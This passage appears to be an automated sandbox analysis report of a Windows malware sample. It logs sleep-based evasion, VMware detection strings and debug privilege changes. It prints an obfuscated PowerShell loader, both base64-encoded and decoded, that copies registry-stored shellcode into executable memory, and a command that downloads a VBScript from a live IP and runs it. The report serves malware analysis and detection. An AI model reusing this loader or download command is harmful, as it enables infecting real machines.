    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6380Thread sleep count: 3021 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6436Thread sleep time: -12912720851596678s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6448Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6368Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6456Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1300Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1300Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.dllJump to dropped file
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
    Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Rl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000001.00000003.261623448.00000211B4F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
    Source: powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
    Source: wscript.exe, 0000000B.00000003.357267664.0000026BD4807000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}4
    Source: powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
    Source: wscript.exe, 0000000B.00000003.357267664.0000026BD4807000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
    Source: wscript.exe, 0000000B.00000003.357267664.0000026BD4807000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: powershell.exe, 00000003.00000002.300706520.00000167FFDB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Encrypted powershell cmdline option found
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #brdfdtton Stvne Zinced INDSTT Mettartamg7 Sala cebal FORST Osteolit1 Undiscou6 Adressa Canadi9 OVERTALE Beme destrukti OSTEANRETN Driftsstyr1 INDLEDENDE Bagt7 BARSLEDES OOPHO Laced9 Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Hexastich1{[DllImport("KERNEL32")]public static extern void RtlMoveMemory(IntPtr Bagfuls51,ref Int32 Bagfuls52,int Bagfuls53);[DllImport("ntdll.dll", EntryPoint="NtAllocateVirtualMemory")]public static extern int VA(int Hexastich6,ref Int32 Semire,int Bagfuls5,ref Int32 Hexastich,int Print8,int Hexastich7);[DllImport("USER32")]public static extern IntPtr EnumWindows(uint Bagfuls55,int Bagfuls56);}"@#DEHACHE Tosse3 Teater6 dialectic ENLISTEDR Fdse7 Astro Swerver9 downey ribhust Tagr Sprges Villa5 Heterodyn1 EUPLOI Bytte3 snkerfr Bundgarn strmkreds Ltningbi5 inds Airlift5 OCTAVINAVI Skokomishb Udrensning5 Thrawcy Monosodi5 impaleme Indsatsent7 ordensm $Hexastich3=0;$Hexastich9=1048576;$Hexastich8=[Hexastich1]::VA(-1,[ref]$Hexastich3,0,[ref]$Hexastich9,12288,64)$Senaterfo=(Get-ItemProperty -Path "HKCU:\Software\TIOLOG").Acetamidph2$Util = [System.Byte[]]::CreateInstance([System.Byte],$Senaterfo.Length / 2)For($i=0; $i -lt $Senaterfo.Length; $i+=2){ $Util[$i/2] = [convert]::ToByte($Senaterfo.Substring($i, 2), 16) }for($concomita=0; $concomita -lt $Util.count ; $concomita++){[Hexastich1]::RtlMoveMemory($Hexastich3+$concomita,[r
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #brdfdtton Stvne Zinced INDSTT Mettartamg7 Sala cebal FORST Osteolit1 Undiscou6 Adressa Canadi9 OVERTALE Beme destrukti OSTEANRETN Driftsstyr1 INDLEDENDE Bagt7 BARSLEDES OOPHO Laced9 Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Hexastich1{[DllImport("KERNEL32")]public static extern void RtlMoveMemory(IntPtr Bagfuls51,ref Int32 Bagfuls52,int Bagfuls53);[DllImport("ntdll.dll", EntryPoint="NtAllocateVirtualMemory")]public static extern int VA(int Hexastich6,ref Int32 Semire,int Bagfuls5,ref Int32 Hexastich,int Print8,int Hexastich7);[DllImport("USER32")]public static extern IntPtr EnumWindows(uint Bagfuls55,int Bagfuls56);}"@#DEHACHE Tosse3 Teater6 dialectic ENLISTEDR Fdse7 Astro Swerver9 downey ribhust Tagr Sprges Villa5 Heterodyn1 EUPLOI Bytte3 snkerfr Bundgarn strmkreds Ltningbi5 inds Airlift5 OCTAVINAVI Skokomishb Udrensning5 Thrawcy Monosodi5 impaleme Indsatsent7 ordensm $Hexastich3=0;$Hexastich9=1048576;$Hexastich8=[Hexastich1]::VA(-1,[ref]$Hexastich3,0,[ref]$Hexastich9,12288,64)$Senaterfo=(Get-ItemProperty -Path "HKCU:\Software\TIOLOG").Acetamidph2$Util = [System.Byte[]]::CreateInstance([System.Byte],$Senaterfo.Length / 2)For($i=0; $i -lt $Senaterfo.Length; $i+=2){ $Util[$i/2] = [convert]::ToByte($Senaterfo.Substring($i, 2), 16) }for($concomita=0; $concomita -lt $Util.count ; $concomita++){[Hexastich1]::RtlMoveMemory($Hexastich3+$concomita,[r
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALA
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Sursdepa.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5295.tmp" "c:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
